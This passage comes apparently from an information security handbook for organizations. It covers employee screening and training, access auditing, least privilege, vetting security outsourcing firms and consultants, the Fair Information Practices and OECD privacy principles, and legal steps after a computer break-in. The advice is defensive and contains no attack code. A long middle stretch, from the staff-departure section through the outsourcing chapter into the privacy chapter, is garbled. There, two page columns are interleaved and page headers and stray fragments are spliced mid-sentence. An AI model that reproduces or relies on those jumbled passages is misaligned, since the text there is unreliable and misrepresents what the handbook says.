In some instances you may want to make more intensive investigations of the character and background of the candidates. Depending on the level of the job and the access that this employee will have to systems and sensitive data, you may want to:

· Have an investigation agency do a background check.
· Get a criminal record check of the individual.
· Check the applicant's credit record for evidence of large personal debt and the inability to pay it. Discuss problems, if you find them, with the applicant. People who are in debt should not be denied jobs: if they are, they will never be able to regain solvency. At the same time, employees who are under financial strain may be more likely to act improperly.
· Consider conducting a polygraph examination of the applicant (if legal). Although polygraph exams are not always accurate, they can be helpful if you have a particularly sensitive position to fill.
· Ask the applicant to obtain bonding for his position.

In general, we don't recommend these steps for hiring every employee. However, you should conduct extra checks of any employee who will be in a position of trust or privileged access--including maintenance and cleaning personnel.

We also suggest that you inform the applicant that you are performing these checks, and obtain his or her consent. This courtesy will make the checks easier to perform and will put the applicant on notice that you are serious about your precautions. In some locales you will need the explicit permission of the candidate to conduct these checks.

Rechecks

Once you have finished the tests and hired the candidate, you should consider revisiting some of the checks on a periodic basis. You would then compare the old and new results and observe changes. Some changes should trigger deeper investigation.

For example, if you have an employee who is in charge of your accounting system, including computer printing of checks to creditors, you likely want to conduct more than a cursory investigation, including a credit check. If a recheck occurs every two years and the employee exhibits spending patterns that are far out of line with his salary and personal means, you may decide to investigate further.

Initial Training

Your security concerns with an employee should not stop after that person is hired. Every potential computer user should undergo fundamental education in security policy as a matter of course. At the least, this education should include procedures for password selection and use, physical access to computers and networks (who is authorized to connect equipment, and how), backup procedures, dial-in policies, and policies for divulging information over the telephone. Executives should not be excluded from these classes because of their status--they are as likely (or more likely) as other personnel to pick poor passwords and commit other errors. They, too, must demonstrate their commitment to security: security consciousness flows from the top down, not the other way.

Education should include written materials and a copy of the computer-use policy. The education should include discussion of appropriate and inappropriate use of the computers and networks, personal use of computing equipment (during and after hours), policies on ownership and use of electronic mail, and policies on import and export of software and data. Penalties for violations of these policies should also be detailed.

All users should sign a form acknowledging the receipt of this information, and their acceptance of its restrictions. These forms should be retained. Later, if any question arises as to whether the employee was given prior warning about what was allowed, there will be proof.

Ongoing Training and Awareness

Periodically, users should be presented with refresher information about security and appropriate use of the computers. This retraining is an opportunity to explain good practice, remind users of current threats and their consequences, and provide a forum to air questions and concerns.

Your staff should also be given adequate opportunities for ongoing training. This training should include support to attend professional conferences and seminars, subscribe to professional and trade periodicals, and obtain reference books and other training materials. Your staff must also be given sufficient time to make use of the material, and positive incentives to master it.

Coupled with periodic education, you may wish to employ various methods of continuing awareness. These methods could include putting up posters or notices about good practice, having periodic messages of the day with tips and reminders, having an "Awareness Day" every few months, or having other events to keep security from fading into the background.

Of course, the nature of your organization, the level of threat and possible loss, and the size and nature of your user population should all be factored into your plans. The cost of awareness activities should also be considered and budgeted in advance.

Performance Reviews and Monitoring

The performance of your staff should be reviewed periodically. In particular, the staff should be given credit and rewarded for professional growth and good practice. At the same time, problems should be identified and addressed in a constructive manner. You must encourage staff members to increase their abilities and enhance their understanding.

You also want to avoid creating situations in which staff members feel overworked, underappreciated, or ignored. Creating such a working environment can lead to carelessness and a lack of interest in protecting the interests of the organization. The staff could also leave for better opportunities. Or worse, the staff could become involved in acts of disruption as a matter of revenge.

Overtime must be an exception and not the rule, and all employees--especially those in critical positions--must be given adequate holiday and vacation time. Overworked, chronically tired employees are more likely to make mistakes, overlook problems, and become emotionally fragile. They also tend to suffer stress in their personal lives -- families and loved ones might like to see them occasionally. Overstressed, overworked employees are likely to become disgruntled, and that does not advance the cause of good security.

In general, users with privileges should be monitored for signs of excessive stress, personal problems, or other indications of difficulties. Identifying such problems and providing help, where possible, is at the very least humane. Such practice is also a way to preserve valuable resources--the users themselves, and the resources to which they have access.

Auditing Access

Ensure that auditing of access to equipment and data is enabled, and is monitored. Furthermore, ensure that anyone with such access knows that auditing is enabled. Many instances of computer abuse are spontaneous in nature. If a possible malefactor knows that the activity and access are logged, he might be discouraged in his actions.

Audit is not only done via the computer. Logs of people entering and leaving the building, electronic lock audit trails, and closed-circuit TV tapes all provide some accountability.

At the same time, we caution against routine, surreptitious monitoring. People do not like the idea that they might not be trusted and could be covertly watched. If they discover that they are, in fact, being watched, they may become very angry and may even take extreme action. In some venues, labor laws and employment contracts can result in the employer's facing large civil judgments.

Simply notifying employees they are being monitored is not sufficient if the monitoring is too comprehensive. Some studies have shown that employees actually misbehave more and are less productive when they are monitored too extensively. This is true whether you are monitoring how often they take coffee breaks, timing every phone call, or keeping a record of every web site visited.

The best policies are those that are formulated with the input of the employees themselves, and with personnel from your human resources department (if you have one).

Least Privilege and Separation of Duties

Consider carefully the time-tested principles of least privilege and separation of duties. These should be employed wherever practical in your operations.

Least privilege

This principle states that you give each person the minimum access necessary to do his or her job. This restricted access is both logical (access to accounts, networks, programs) and physical (access to computers, backup tapes, and other peripherals). If every user has accounts on every system and has physical access to everything, then all users are roughly equivalent in their level of threat.

Separation of duties

This principle states that you should carefully separate duties so that people involved in checking for inappropriate use are not also capable of making such inappropriate use. Thus, having all the security functions and audit responsibilities reside in the same person is dangerous. This practice can lead to a case in which the person may violate security policy and commit prohibited acts, yet in which no other person sees the audit trail to be alerted to the problem.

Limit Your Reliance on Key Employees

No one in an organization should be irreplaceable, because no human is immortal. If your organization depends on the ongoing performance of a key employee, then your organization is at risk. Organizations cannot help but have key employees. To be secure, organizations should have written policies and plans established for unexpected illness or departure.

In one case that we are familiar with, a small company with 100 employees had spent more than 10 years developing its own custom-written accounting and order entry system. The system was written in a programming language that was not readily known, originally provided by a company that had possibly gone out of business. Two people understood the organization's system: the MIS director and her programmer. These two people were responsible for making changes to the account system's programs, preparing annual reports, repairing computer equipment when it broke, and even performing backups (which were stored, off-site, at the MIS director's home office).

What would happen if the MIS director and her programmer were killed one day in a car accident on their way to meet with a vendor? What would happen if the MIS director were offered a better job, at twice the salary? What if the programmer, unable to advance in his position because of the need to keep a key employee in his role, became frustrated and angry at the organization?

That key personnel are irreplaceable is one of the real costs associated with computer systems--one that is rarely appreciated by an organization's senior management. The drawbacks of this case illustrate one more compelling reason to use off-the-shelf software, and to have established written policies and procedures, so that a newly hired replacement can easily fill another's shoes.

Absence and Departure

People leave jobs, sometimes on their own, and sometimes involuntarily--as a result of many circumstances, including death or physical incapacitation. In the shorter term, people also take vacations or are absent for family or other personal reasons. In any such cases, you should have a defined set of actions for how to handle the departure or absence. This procedure should include shutting down accounts (not for absence); forwarding e-mail to appropriate parties; changing critical passwords, phone numbers, and combinations; checking voice mail accounts; and otherwise removing access to your systems.

In some environments, this suggestion may be too drastic. In the case of a university, for instance, graduated students might be allowed to keep accounts active for months or years after they leave. If an employee is out on vacation or absent for illness for a few days, you will not shut down his or her account, or change passwords and phone numbers. However, in other environments, a departure is quite sudden and dramatic. Someone may show up at work, only to find the locks changed and a security guard waiting with a box containing everything that was in the user's desk drawers.

· Security guards
· Delivery personnel who have regular or unsupervised access
The account has · Consultants already been deleted; all system passwords have been · Auditor and other financial personnel changed; and the user's office phone number is no longer assigned. This form of separation management is All personnel who do have access should be trained quite common in financial service industries, and is about security and loss prevention and should be peri- understood to be part of the job. Usually, these are odically retrained. Personnel should also be briefed on employees hired "at will" and with contracts stating incident response procedures and on the penalties for that such a course of action may occur for any reason security violations. -- or no stated reason at all. Use your common sense; in each case, you must determine exactly what the policy Don't forget your family! Whether you are protecting a on access should be and articulate that clearly to the home system or occasionally have your kids visit your employees and the people responsible for implementing office, it is important that they understand that the that policy. computer is not a toy. They should be taught to leave business-critical machines and media alone. Having Security Concerns with Other Personnel strong passwords and screensavers in place can be a major help. Additionally, teach your family members Other people who have access to your system may not all about not discussing your business computing have your best interests in mind -- or they may simply environment with strangers. be ignorant of the damage they can wreak. We've heard stories about home environments where playmates of children have introduced viruses into home office sys- tems, and where spouses have scoured disks for evidence of marital infidelity--and then trashed systems where they have found it. In business environments, there are stories of cleaning staff and office temps who have been caught sabotaging or snooping on company computers. 
You may not be able to choose your family, but you can have some impact on who accesses the computers at your company location. Visitors, maintenance personnel, contractors, vendors, and others may all have temporary or semi-permanent access to your location and to your systems. You should consider how everything we discussed earlier can be applied to these people with temporary access. At the very least, no one from the outside should be allowed unrestricted physical access to your computer and network equipment. Examples of people whose backgrounds should be examined include: · System operators and administrators · Temporary workers and contractors who have access to the system · Cleaning and maintenance personnel Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 117 CHAPTER 7. West, there has been a boom in the deployment of SECURITY OUTSOURCING consultants and outsourced services to help organizations of all sizes meet their information security needs. At a Glance As with many other outsourced services, some are first-rate and comprehensive, others are overspecialized, and some are downright deficient. Sadly, the state of Outsourcing is one option for managers in public, the field is such that some poor offerings are not private, and non-profit entities who are concerned recognized as such either by the customers or by with their capacity to respond to the security threats the well- intentioned people offering them! discussed in this Handbook. While it may be a good solution for some organizations, the selection of If you have not yet formulated your policies and built outsourcing firms must be done carefully and the new up your disaster recovery and incident response plans, security partners should be monitored for performance we recommend that you get outside assistance in for- on a regular basis. This chapter covers some of the mulating them. 
What follows, then, is our recommenda- benefits and drawbacks of security outsourcing and tions for organizations that seek to employ outside suggests a series of questions that should be asked security professionals for formulating and implementing before an arrangement is finalized. security policies. There are a number of international Outsourcing as an Alternative to "Doing it organizations that provide assistance to developing Yourself" countries in the field of IT deployment; if such expert- ise is available, it can be valuable in terms of both P short-term support and longer term capacity building After reading through all the material in these chapters, ART (education and training) for the local population. you may have realized that your policies and plans are in good shape, or you may have identified some things Formulating Your Plan of Action to do, or you may be daunted by the whole task. If you THREE are in that last category don't decide that the situation The first thing to do is decide what services you need: is beyond your ability to cope! There are other approaches to formulating your policies and plans, and Will you provide your own in-house security staff? in providing security at your site: through outsourcing, consultants, and contractors. Even if you are an individ- If so, you may only need consultants to review your ual with a small business at home, or a small firm operations to ensure that you haven't missed anything dependent on ICTs, you can take advantage of shared important. expertise --security firms that are able to employ a group of highly-trained and experienced personnel who Perhaps you have some in-house expertise, but are worried would not be fully utilized at any one site, and share about demands on their time, or their ability to respond their talents with a collection of clients whose to a crisis? aggregate needs match their capabilities. 
Then you may be in the market for an outside firm to On the other hand, if you have strong information place one or more contractors on site with you, full or technology skills, you may consider starting your own part-time. Or, you might simply want to engage the firm to supply expertise and training to others in need services of a remote monitoring and response firm to of those services. There is significant business potential watch your security and assist in the event of an incident. in such enterprises; as there are not enough information security experts available to meet all the needs of Or perhaps you can't afford a full-time staff, or you industry and government worldwide.58 Thus, in the aren't likely to need such assistance? 58The lack of trained security experts is a result, in part, of the lack of personnel and resources to support infor-mation security education at colleges and universities. Government and industry claim that this is an area of importance, but they have largely failed to put any real resources into play to help build up the field. 118 INFORMATION SECURITY AND GOVERNMENT POLICIES In this case, having a contract with a full-service the later "People" section. Be wary of large consulting consulting and monitoring firm may be more firms that will not give you the names of specific cost-effective and provide you with what you need. individuals who would work on your account until after you sign a retainer with them. The key in each of these cases is to understand what your needs are and what the services provide. This Be concerned about corporate stability is not always simple, because unless you have some experience with security and know your environment If you are engaging an organization for a long-term well, you may not really understand your needs. project, you need to be sure that the organization will be there in the long-term. 
This is not to say that you Choosing a Vendor should avoid hiring young firms and startups; you should simply be sure that the organization has both Your experience with outsourcing policy decisions the management and the financial backing to fulfill all will depend, to a great extent, on the individuals of its commitments. Beware of consulting firms whose or organizations that you choose for the job. prices seem too low -- if the organization can't make money selling you the services that you are buying, then Get a referral; insist on references they need to be making the money somewhere else. Because of the tremendous variation among consulting firms, one of the best ways to find a firm that you like Beware of soup-to-nuts is to ask for a referral from a friendly organization that is similar to yours. Sadly, it is not always possible to Be cautions about "all-in-one" contracts where a single get a referral. Many organizations engage consulting firm both provides you policies and then sells you services firms that they first meet at a trade show, read about and hardware to implement the policies. We have heard in a news article, or even engage after receiving stories of such services where the policy and plan needs a "cold-call" from a salesperson. for every client are suspiciously alike, and all involve the same basic hardware and consulting solutions. If Clearly, an outsourcing firm is in a position to do a you pick a firm that does not lock you into a long-term tremendous amount of damage to your organization. exclusive relationship, then there may be a better Even if the outsourcing firm is completely honest and chance that the policies they formulate for you will reasonably competent, if you trust them to perform a actually match your needs, rather than the equipment function and that function is performed inadequately, that they are selling. 
you may not discover that anything is wrong until months later when you suffer the consequences -- Insist on breadth of background and after your relationship with the firm is long over. You should be equally cautious of firms in which the bulk For this reason, when you are considering a firm, of their experience is with a specific kind of customer or you should: software platform -- unless your organization precisely matches the other organizations that the firm has had as Check references clients. For example, a consulting firm that primarily offers outsourced security services to medium-sized police Ask for professional references that have engaged the departments running Microsoft Windows may not be the firm or individual to perform services that are similar to best choice for a pharmaceutical firm with a mixed those that you are considering Windows and Unix environment. The consulting firm may simply lack the breadth to offer truly comprehensive policy Check people services for your environment. That isn't to say that people with diverse background can't provide you with an appro- If specific individuals are being proposed for your job, priate perspective, but you need to be cautious if there is evaluate them using the techniques that we outline in no obvious evidence of that "big picture" view. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 119 At a minimum, their personnel should be familiar with: Qualifications of IT Security Personnel 1. Employment law and management issues that may Most importantly, you need to be concerned about the predict conditions under which insiders may harbor actual people who are delivering your security policy a grudge against their employer and implementation services. In contrast to other con- 2. National and local computer crime laws sulting services, you need to be especially cautious of 3. Encryption products, technologies, and limitations consultants who are hired for security engagements -- 4. 
Issues of viruses, worms, and other malicious because hiring outsiders almost always means that you software, as well as scanning software are granting them some level of privileged access to 5. TCP/IP fundamentals and issues of virtual private your systems and your information. networks (VPNs) and firewalls 6. Awareness and educational issues, materials As we noted earlier, there aren't enough real experts to and services go around. This means that sometimes you have to go 7. Issues of incident response and forensic with personnel whose expertise isn't quite as compre- investigation hensive as you would like, but who have as much as you 8. Security issues peculiar to your hardware and can afford. Be careful of false claims of expertise, or of software the wrong kind of expertise. It is better to hire an indi- 9. Best practices, formal risk assessment vidual or firm that admits they are "learning on the methodologies, and insurance issues job" (and, presumably, lowering their fee as a result), than to hire one that is attempting to hide employee P Any good security policy consulting service should have deficiencies. ART personnel who are willing to talk about (without prompting) the various issues we have discussed in this In the developed world, today's security market is filled Handbook, and this chapter in particular. If they are with people who have varying amounts of expertise THREE not prepared or able to discuss these topics, they may in securing Windows platforms. Expertise in other not be the right service for you. platforms, including Unix, is more limited. A great deal can be learned from books, but that is not enough. If you have any concerns, ask to see a policy and Look for qualifications by the personnel in areas that procedures document prepared for another customer. are of concern. 
In particular: Some firms may be willing to show you such documentation after it has been sanitized to remove Certification the other customer's name and other identifying aspects. Other firms may have clients who have offered to be Look for certifications. In addition, make sure that "reference clients," although some firms may insist that those certifications are actually meaningful. Some certi- you sign a non-disclosure agreement with them before fications can essentially be purchased: one need only specific documents will be revealed. Avoid any consulting attend a series of classes or online seminars, memorize the firm that shares with you the names and documents of material, and take a test. These are not particularly valu- other clients without those clients' permission. Finally, if able. Other certifications require more in-depth expertise. you have hired outside experts, one of the conditions of your contract should be that they will help develop local Certification is an evolving field, so we hesitate to cite capacity at your organization and, possibly, in your area. current examples. Although it's not everything we would It is quite natural that foreign expertise may be needed like it to be, the CISSP certification59 is one valid measure during transitional periods of learning in developing coun- of a certain level of experience and expertise in security.60 tries. Ideally, you will capitalize on these relationships to transfer knowledge and build local capacity and national expertise when possible. 59See the web portal for CISSP at: http://www.cissps.com/ 60See also, CISA (Certified Information Systems Auditor) and CISM (Certified Information Security Manager) designations from ISACA at: www.isaca.org 120 INFORMATION SECURITY AND GOVERNMENT POLICIES Education Affiliations Check educational backgrounds. Some people with Ask what professional organizations they belong to and excellent computer skills are self-taught and others are in good standing with. 
ACM, ASIS, CSI, IEEE, and will have degrees from colleges or university programs USENIX are all worthy of note. These organizations provide in computing sciences or computer engineering. In the members with educational materials and professional global context, the level of skill may be more important development opportunities. Many of them also promote that degrees received. However, honesty about education- standards of professional behavior that are worthy of al achievement is important; as we mentioned previously note. If your subject claims membership only in groups in the personnel section, do check to see that claims of like "The 133t Hax0r Guild" or similar, you may wish to education match reality. In the U.S., the National Security look elsewhere for expertise. Agency has designated a limited number of educational institutes as "Centers of Educational Excellence" in the "Reformed" hackers field of information security. In July 2002, that list included pioneering infosec programs at George Mason We recommend against hiring individuals and organizations University; James Madison University; Idaho State; Iowa who boast that they employ "reformed hackers" as security State; the Naval Postgraduate School; Purdue University, consultants.61 Although it is true that some people who the University of California at Davis; and the University of once engaged in computer misdeeds (either "black hat" Idaho. There are many IT initiatives underway around the or "gray hat") can turn their lives around and become world; check your local resources, including universities, productive members of society, you should be immedi- to see where similar centers may be located. In addition, ately suspicious of individuals who tout previous criminal select organization references have been provided in the activity as a job qualification and badge of honor. Annexes of this Handbook. Specifically: Reputation 1. 
Individuals with a record of flaunting laws, property If someone has written a widely-used piece of software ownership, and privacy rights do not seem to be good or authored a well-known book on a security topic such prospects for protecting property, privacy, and safe- as viruses or cryptography, that does not mean that he guarding your resources. Would you hire a convicted or she knows the security field as a whole. Some arsonist to design your fire alarm system? Would you authors really do have a far-rang-ing and deep back- hire a convicted (but "reformed") pedophile to run your ground in security. Others are simply good writers or company daycare center? Not only are these bad ideas, programmers. Be aware that having a reputation doesn't but they potentially open you up to civil liability should necessarily imply competency at consulting. a problem occur -- after all, you knew the history and hired them anyway. The same is true for hiring "darkside Bonding and insurance but reformed" hackers. 2. Likewise, we believe that you should be concerned Ask if the personnel you want to hire are bonded or about individuals who refuse to provide you with their insured. This indicates that an outside agency is willing legal names in the course of the interview process, but to back the competency and behavior of the people. This instead use consulting handles such as "HackExpert" may not ensure that the consultant is qualified, but it and "Demon Dialer." Mr. Dialer may in fact be an expert does provide some assurance that they are not criminals. in how to penetrate an organization using a telephone system. But one of the primary reasons that people use pseudonyms is so that they cannot be held responsible for their actions. It is much easier (and a lot more common) 61See statistics on U.S. 
corporations who would hire reformed hackers in the 2003 CSI/FBI Computer Crime and Security Survey: http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/FBI2003.pdf Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 121 to change a handle if you soil its reputation than it is 3. Ensure that due care has been taken in developing, to change your legal name. testing and deploying the technology being added to 3. Finally, many of today's "hackers" really aren't that your systems, especially if it is proprietary in design. In good, anyway -- they are closer in both their manner particular, given Microsoft's record of software quality and their modus operandi to today's street thugs than and security issues, we would suggest that you give they are to today's computer programmers and system very careful thought to using any company that has architects. It's the poor quality of today's operating sys- decided to base their security technology on Microsoft tems, the lack of security procedures, and the wide- products, though the company is working to patch flaws spread availability of automated penetration tools that in their most popular products. makes it possible for today's attackers to compromise 4. Understand whether their technology actually systems. Just as somebody with a record of carjackings helps to prevent problems from occurring, or only is probably not a skilled race car driver and engine detects problems after they have happened designer, somebody who knows how to scam "warez" (e.g., intrusion prevention versus intrusion detection). and launch denial-of-service attacks probably lacks a fundamental understanding of the security needed to Final Words on Outsourcing keep systems safe. Using outside experts can be a smart move to protect Monitoring Services yourself. 
The skills needed to write policies, monitor your intrusion detection systems and firewalls, and pre- Monitoring services can be a good investment if your pare and execute a disaster recovery plan are specialized P overall situation warrants. Common services provided and uncommon. They may not be available among your ART on an ongoing basis include on-site administration via current staff. Performing these tasks correctly can make contractors, both on-site and off-site monitoring of the difference between staying in business or having some security, on-call incident response and forensics, and flashy and exciting failures. THREE maintenance of a hot-spare/fallback site to be used in the event of a site disaster. But in addition to At the same time, the field of security consulting is being concerned about the individuals who provide fraught with danger because it is new and not well consulting services, you also need to be cautious understood. Charlatans, frauds, naifs, and novices are about what hardware and software they intend to use. present and sometimes difficult to distinguish from the many reliable professionals who are working diligently Many of the monitoring and response firms have hardware in the field. Time will help sort out the issues, but in and software they will want to install on your network. the meantime it pays to invest some time and effort in They use this to collect audit data and manipulate security making the right selection. settings. You need to be cautious about this technology because it is placed in a privileged position inside your We suggest that one way to help protect yourself and security perimeter. In particular, you should: take advantage of the growth of the field is to avoid entering into long-term contracts unless you are very 1. Ensure that you are given complete descriptions, confident in your supplier. 
The security consulting land- in writing, of the functionality of every item placed on scape is likely to change a great deal over the next few your network or equipment. Be certain you understand years, and having the ability to explore other options as how it works and what it does. those changes occur is likely to be to your benefit. 2. Get a written statement of responsibility for failures. Last of all, simply because you contract for services to If the inserted hardware or software exposes your data to monitor your systems for misuse, don't lose site of the the outside world or unexpectedly crashes your systems need to be vigilant to the extent possible, and to build during peak business hours, you should not then discover your systems to be stronger. As the threats become more that you have agreed that the vendor has no liability. sophisticated, so do the defenders... and potential victims. 122 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 8. Policies That Protect Privacy and PRIVACY POLICIES, LEGISLATION, Privacy Policies AND GOVERNMENT REGULATION What standards should online businesses and organizations At a Glance follow with regard to the personally identifiable information that they gather? This chapter provides an overview of public policies that are directly related to business, non--profit, and govern- In the United States, consumer rights were first mental operations in a networked world. There are some addressed clearly through the passage of the Fair examples of legislation that has been designed to protect Credit Reporting Act in 1970. 
This law gave consumers citizens, customers, and children from identity theft, fundamental rights, including the right to see their credit fraud, and obscene content; Part 4 contains a deeper reports; the right to know the third-parties to whom their discussion of regulatory issues in "cyberspace," here reports had been disclosed; the right to force credit we are focusing on organizational responsibility for reporting agencies to re-investigate "errors" detected by interactions with the public. This chapter will focus, consumers; the right to force the agencies to include a in brief, on issues that are relevant in the e-commerce statement from the consumer on reports that were in and e-finance contexts. dispute; and a sunset provision requiring credit reporting agencies to purge information on a consumer's report The Business-Customer Relationship in a that was more than seven years old (ten years for infor- Digital World mation regarding bankruptcies). In 1973, the Code of Fair Information Practices was produced to supplement the Online businesses know a lot about their customers. An discussion of consumer rights in an age when computers online merchant knows every product that you look at, were beginning to hold more personal data. every product that you put in your "shopping cart" but 62 later take out, and anything that you've ever purchased The Code of Fair Information Practices from them online. Online merchants also know when you shop, if you shop from home or from work, and--if they The Code of Fair Information Practices is based on five care--what your credit rating is. Furthermore, unlike the principles: offline world, an online merchant can correlate your shopping profile with your web browsing habits. · There must be no personal data record-keeping systems whose very existence is secret. 
Potentially, Internet service providers could learn even more about their customers, because all information that an Internet user sees must first pass through the provider's computers. ISPs could also determine the web sites that their users frequent--and even the individual articles that have been viewed. They could analyze e-mail messages for keywords. By tracking this information, an Internet provider could tell if its users are interested in boats or cars, whether they care about fashion, or even if they are interested in particular medical diseases.

· There must be a way for a person to find out what information about the person is in a record and how it is used.
· There must be a way for a person to prevent information about the person that was obtained for one purpose from being used or made available for other purposes without the person's consent.
· There must be a way for a person to correct or amend a record of identifiable information about the person.
· Any organization creating, maintaining, using, or disseminating records of identifiable personal data must assure the reliability of the data for its intended use and must take precautions to prevent misuses of the data.

[62] Source: U.S. Department of Health, Education, and Welfare, 1973.

Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 123

In the United States, Congress continued to pass legislation regulating the use of personal information. Over time, banking records; telephone, Internet, and cable subscriber records; medical records; educational records; and even video-tape rental records all came under protection by U.S. Congressional action. However, each of these pieces of legislation offered different protections and was enforced by a different part of the federal government. Some acts, like the anti-junk-fax Telephone Consumer Privacy Act, did not have any enforcement mechanism at all other than private lawsuits.

Things were different in Europe. Building on the experience of World War II, during which personal records were misused by the Nazis, most European governments created an institutional framework for regulating the collection and use of personal information. The Europeans extended the ideas expressed in the Code of Fair Information Practices into an overall system that was termed data protection.

OECD Guidelines

In 1980, the Organization for Economic Development and Cooperation (OECD) adopted an expanded set of privacy guidelines. These guidelines were designed, in part, to harmonize the growing number of privacy regulations throughout the industrialized world. The guidelines were also specifically designed to deal with the growing problem of transborder data flows--the movement of personal information from one country, where that data might be highly protected, to another country that might have lesser protections.

The OECD Guidelines on the Protection of Privacy and Transborder Flows of Personal Data consist of eight principles:

Collection Limitation Principle

There should be limits to the collection of personal data, and any such data should be obtained by lawful and fair means and, where appropriate, with the knowledge or consent of the data subject.

Data Quality Principle

Personal data should be relevant to the purposes for which it is to be used, and, to the extent necessary for those purposes, should be accurate, complete, and kept up to date.

Purpose Specification Principle

The purposes for which personal data is collected should be specified not later than at the time of data collection, and the subsequent use limited to the fulfillment of those purposes or such others as are not incompatible with those purposes and as are specified on each occasion of change of purpose.

Use Limitation Principle

Personal data should not be disclosed, made available, or otherwise used for purposes other than those specified in accordance with the previous principle except:

· With the consent of the data subject, or
· By the authority of law.

Security Safeguards Principle

Personal data should be protected by reasonable security safeguards against such risks as loss or unauthorized access, destruction, use, modification, or disclosure of data.

Openness Principle

There should be a general policy of openness about developments, practices, and policies with respect to personal data. Means should be readily available of establishing the existence and nature of personal data, and the main purposes of their use, as well as the identity and usual residence of the data controller.

Individual Participation Principle

An individual should have the right:

· To obtain from a data controller, or otherwise, confirmation of whether or not the data controller has data relating to him;
· To have communicated to him, data relating to him:
  o Within a reasonable time;
  o At a charge, if any, that is not excessive;
  o In a reasonable manner; and
  o In a form that is readily intelligible to him;
· To be given reasons if a request made as specified above is denied, and to be able to challenge such denial; and
· To challenge data relating to him and, if the challenge is successful, to have the data erased, rectified, completed, or amended.

Accountability Principle

A data controller should be accountable for complying with measures that give effect to the principles stated above.

The OECD Guidelines do not have the force of law, but are instead used as guidelines for each OECD member country when passing its own laws. See Part 3, Chapter 11 for a simple checklist on data protection measures that may be taken if you gather information about potential customers on your web site.

CHAPTER 9. COMPUTER CRIME

At a Glance

We hope that you will never have to act on the information in this chapter. You may have studied this Handbook diligently and taken every reasonable step toward protecting your system, yet someone has still abused it. Perhaps an ex-employee has broken in through an old account and has deleted some records. Perhaps someone from outside continues to try to break into your system despite warnings that they should stop. What recourse do you have through the courts? Furthermore, what are some of the particular dangers you may face from the legal system during the normal operation of your computer system? What happens if you are the target of legal action? This chapter attempts to illuminate some of these issues. The material we present should be viewed as general advice, and not as legal opinion: for that, you should contact good legal counsel and have them advise you.

Your Legal Options After a Break-In

If you suffer a break-in or criminal damage to your system, you may have a variety of recourses under your legal system. This chapter cannot advise you on the many subtle aspects of the law. There are many differences in legal systems and laws from country to country, as well as different laws that apply to computer systems used for different purposes. Laws outside the United States vary considerably from jurisdiction to jurisdiction; we won't attempt to explain anything beyond the U.S. system.[63] However, we should note that the global reach of the Internet may bring laws to bear that have their origin outside the U.S.

Discuss your specific situation with a competent lawyer before pursuing any legal recourse. Because there are difficulties and dangers associated with legal approaches, you should be sure that you want to pursue this course of action before you go ahead.

In some cases, you may have no choice; you may be required to pursue legal action. For example:

· If you want to file a claim against your insurance policy to receive money for damages resulting from a break-in, you may be required by your insurance company to pursue criminal or civil actions against the perpetrators.
· If you are involved with classified data processing, you may be required by government regulations to report and investigate suspicious activity.
· If you are aware of criminal activity and you do not report it, you may be criminally liable as an accessory. This is especially true if your computer is being used for the illegal activity.
· If your computer is being used for certain forms of unlawful or inappropriate activity and you do not take definitive action, you may be named as a defendant in a civil lawsuit seeking punitive damages.
· If you are an executive of a public company and decide not to investigate and prosecute illegal activity, shareholders of your corporation can bring suit against you.
· If you are an executive of a private company, though you do not have shareholders, it may be possible for suppliers, partners, or customers to bring suit against you, depending on the laws on computer crime in your country.

If you are working in a company and believe that your system is at especially high risk for attack, you should probably speak with your organization's legal counsel as part of your security incident preplanning, before you have an incident. Organizations have different policies regarding when law enforcement should or should not be involved. By doing your homework, you increase the chances that these policies will actually be followed when they are needed.

To provide some starting points for discussion, this section gives an overview of a few issues you might want to consider.

Filing a Criminal Complaint

In the United States, you are free to contact law enforcement personnel any time you believe that someone has broken a criminal statute. You start the process by making a formal complaint to a law enforcement agency. A prosecutor may be asked to decide if the allegations should be investigated and what charges should be filed, if any.

In some cases--perhaps a majority of them--criminal investigation will not help your situation. If the perpetrators have left little trace of their activity and the activity is not likely to recur, or if the perpetrators are entering your system through a computer in a foreign country, you probably will not be able to trace or arrest the individuals involved. Many experienced computer intruders will leave little tracing evidence behind.[64]

If you do file a complaint, there is no guarantee that the agency will actually conduct a criminal investigation. The prosecutor involved (federal, state, or local) decides which, if any, laws have been broken, the seriousness of the crime, the availability of trained investigators, and the probability of a conviction. Remember that the criminal justice system is overloaded; new investigations are started only for severe violations of the law or for cases that warrant special treatment. A case in which $200,000 worth of data is destroyed is more likely to be investigated than a case in which someone is repeatedly scanning your home computer through your cable modem.

If an investigation is conducted, you may be involved with the investigators or you may be completely isolated from them. You may even be given erroneous information--that is, you may be told that no investigation is taking place, even though a full-scale investigation is in the works. Many investigations are conducted on a "need to know" basis, occasionally using classified techniques and informants. If you are told that there is no investigation and in fact there is one, the person who gives you this information may be deliberately misinforming you, or they themselves may simply not have the "need to know."

Investigations can place you in an uncomfortable and possibly dangerous position. If unknown parties are continuing to break into your system by remote means, law enforcement authorities may ask you to leave your system open, thus allowing the investigators to trace the connection and gather evidence for an arrest. Unfortunately, if you leave your system open after discovering that it is being misused, and the perpetrator uses your system to break into or damage another system elsewhere, you may be the target of a third-party lawsuit. Cooperating with law enforcement agents is not a sufficient shield from such liability. Investigate the potential ramifications before putting yourself at risk in this way.

Contacting the Relevant Authorities

Depending on the criminal and legal systems in your country, there may be specific processes for contacting local or state authorities in the case of computer crime. The following are general suggestions, but it will be most effective if you follow the customs appropriate to your region.

· You might approach local or state authorities first, if possible. If your local law enforcement personnel believe that the crime is more appropriately investigated by the Federal government, they will suggest that you contact them. Unfortunately, some local law enforcement agencies may be reluctant to seek outside help or to bring in Federal agents. This may keep your particular case from being investigated properly.
· Local authorities may be more responsive, because you are not as likely to be competing with a large number of other cases (as frequently occurs in the United States at the federal level). Local authorities may be more likely to be interested in your problem, no matter how small the problem may be.
· At the same time, although some local authorities are tremendously well-versed in computers and computer crime, even in the U.S. local authorities generally have less expertise than state and federal authorities and may be reluctant to take on high-tech investigations. Many federal agencies have expertise that can be brought in quickly to help deal with a problem.
· In the U.S., state authorities may be more interested than federal authorities in investigating and prosecuting juveniles. If you know that you are being attacked by a juvenile who is in your state, you may be better off dealing with local authorities. In some cases, you may find that it is better to bypass the legal system entirely and speak with the juvenile's parents or teachers (or have an attorney or imposing police officer speak to them).

Hazards of Criminal Prosecution

